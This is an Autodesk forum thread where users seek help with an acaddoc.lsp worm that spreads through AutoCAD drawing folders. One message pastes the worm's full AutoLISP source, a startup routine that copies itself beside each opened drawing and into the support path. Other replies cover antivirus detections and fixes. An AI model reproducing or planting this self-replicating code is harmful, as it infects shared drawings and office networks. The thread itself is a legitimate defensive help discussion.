AutoCAD Structural Detailing Forum
Welcome to Autodesk’s AutoCAD Structural Detailing Forums. Share your knowledge, ask questions, and explore popular AutoCAD Structural Detailing topics.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

acaddoc.lsp virus

10 REPLIES 10
SOLVED
Reply
Message 1 of 11
StefanoPasquini6790
15938 Views, 10 Replies

acaddoc.lsp virus

Hi everyone,

 

I have a little problem, everytime i save a *.dwg file in a folder, it appear a acaddoc.lsp file at its side.

 

I've searching on line and i've understood that this is a virus. There was a lot of solutions, someone simple and someone difficult...I'd like to know from Autodesk which is the official solution for this issue.

 

I have a building design suite 2013 with service pack 1 installed.

 

many many thanks 


PasProStudio

www.pasquiniprogetti.eu

Structural + Detailing engineers
10 REPLIES 10
Message 2 of 11

they have this virus: http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=13717811&linkID=9240617

don't know if its the same as yours

DarrenP
Did you find this post helpful? Feel free to Like this post.
Did your question get successfully answered? Then click on the ACCEPT SOLUTION button.

EESignature

Message 3 of 11

Hi, following your suggestion I've installed the service pack 1.1 for acad 2013 and this issue was fixed. Unfortunately this work only in acad 2013, for ASD 2013 the problem in not resolved!

 

How can I fix it also in ASD 2013

 

Best regards.


PasProStudio

www.pasquiniprogetti.eu

Structural + Detailing engineers
Message 4 of 11

Hi everyone,

 

in this post I write the acaddoc.lsp that appear in the drawing folder when I create or save a file. I repeat, in ACAD 2013 this issue was fixed with SP 1.1, in asd 2013 this don't work. Please help me, I'd like to know if this lisp can damage or corrupt my drawings. I can't loose work!!!!!

 

text of acaddoc.lsp

_____________________________________________________________________________________________

 

(vl-load-com)
(defun-q s::startup
(/ basepath
baseacad
acaddocpath
r-acaddoc
w-basepath
rl-acaddoc
acaddoclsp
c-acaddocname
c-acaddocpath
c-acaddoc
)
(setq basepath
(findfile "base.dcl")
)
(setq basepath
(substr basepath
1 (- (strlen basepath) 😎
)
)
(setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
(findfile "acaddoc.lsp")
)
(setq acaddocpath
(substr acaddocpath
1 (- (strlen acaddocpath) 11)
)
)
(setq acaddoclsp
(strcat acaddocpath "acaddoc.lsp"))


(setq c-acaddocname
(getvar "dwgname")
)
(setq c-acaddocpath
(findfile c-acaddocname)
)
(setq c-acaddocpath
(substr c-acaddocpath
1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
)
)
(setq c-acaddoc
(strcat c-acaddocpath "acaddoc.lsp")
)
(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath)
)
(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open baseacad "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)

(progn
(setq r-acaddoc
(open acaddoclsp "r")
)
(setq w-basepath
(open c-acaddoc "w")
)
(while
(setq rl-acaddoc
(read-line r-acaddoc)
)
(write-line rl-acaddoc w-basepath)
)
(close w-basepath)
(close r-acaddoc)

)
)
(princ)
)

______________________________________________________________________________________________

 

I found in CADalyst an app to kill this worm, his name is KillWorm-for Cadalyst, I tried with it to kill all my worm, but this don't fix anything.

 

I need an help from Autodesk.


PasProStudio

www.pasquiniprogetti.eu

Structural + Detailing engineers
Message 5 of 11

We have this issue. 

 

In our office we have a combination of AutoCAD 2012 and AutoCAD LT 2013.

 

We have tried the solution outlined at:

http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=13717811&linkID=9240617

 

This has not worked.

 

We routinely run a virus scan on our machines and our server looking for acaddoc.lsp files.

 

We use Endpoint Security.  Our virus scan notes that these files are a virus and removes them.

 

We also find the following:

 

We find the acad.mnl file is infected.  Our virus scan tells us that it is a W32/Bursted.L virus.

We find acaddoc.lsp files in all drawing folders.  Our virus scan tells us that it is:  ACAD/Bursted.I

We find the acad2012.lsp file, the acad2012doc.lsp, the acadinfo.lsp file are all noted as being the W32/Bursted.L virus.

 

All of these files keep coming back.  Nothing seems to have helped elminate this from our server or any of our machines.

 

Does anyone have any solution?

This is a problem that is particular to AutoCAD.  Our machines that don't have AutoCAD on them do not have this problem.  We would very much appreciate some help from Autodesk.

 

Thanks.

Message 6 of 11

Hi everyone,

 

I've fix this issue changing the antivirus sofware. When I use AVG the virus was not detected, changing in Microsoft Essentials I've fixed everything.

 

Greetings at all


PasProStudio

www.pasquiniprogetti.eu

Structural + Detailing engineers
Message 7 of 11

Thankyou very much!...
Message 8 of 11
cadmgr
in reply to: DarrenP

As an FYI, the link to ...9240617 is stale now, leading to a blank search page. 

Message 9 of 11

Hi, try to install Microsoft security essential as antivirus:

 

https://www.microsoft.com/it-it/download/details.aspx?id=5201

 

Let me know if it solve.

 

Cheers


PasProStudio

www.pasquiniprogetti.eu

Structural + Detailing engineers
Message 10 of 11

Thank you!  We caught it early - our McAfee scanner automatically recognized and deleted the reportedly infected file in about four of the six cases discovered.  I manually deleted the other two, as they had been cleaned but not deleted  I believe the subject file hijacked rides up to our ftp site in one or two instances, from an associate who has now quarantined his network to make sure they get clean. 

 

I understand that the payload of this version (at least, as of 2003) is to disable three ACAD commands, but none of my users experienced any issues outside of the malware scanner's report of ALS/Bursted in the file.  This said, it's been only about 24 hours since it popped up, and it's theoretically possible that it could have been downloaded to other machines before the production server scan completed.  All things considered, it appears to be a pretty simple and possibly inert worm at this point in time.  I would be interested in hearing reports of actual trouble it has caused (over and above scaring users and annoying admins). 

 

 

One more thing:  None of my comments here should be construed by anyone as an excuse to exercise less than the greatest care and rigor regarding your network security and anti-malware protection.  The only true protection is to stay off the internet.  Every web connection poses a risk and demands good protection, timely backups, a disaster recovery plan and multiple scanners to cross-check reported threats when appropriate. 

Message 11 of 11
BarclayS_95
in reply to: cadmgr

Guys, thank you! in this thread lots of useful information!

Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

”Boost

 

”Tips